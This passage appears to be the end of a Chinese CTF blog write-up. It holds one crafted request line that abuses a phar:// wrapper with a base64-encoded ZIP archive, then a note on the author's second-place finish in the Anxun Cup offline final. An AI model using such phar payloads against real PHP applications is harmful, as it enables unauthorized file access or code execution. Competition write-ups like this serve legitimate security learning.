world=a=phar://hello.txt/ttt.txt%26hello=UEsDBAoAAAAAAC6Me1NJEIKwAwAAAAMAAAAHAAAAdHR0LnR4dHR0dFBLAQI%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

补充:线下战报

安询杯线下决赛取得第二名,获得一等奖。

作者

n03tAck

发布于

2021-11-28

更新于

2021-12-17
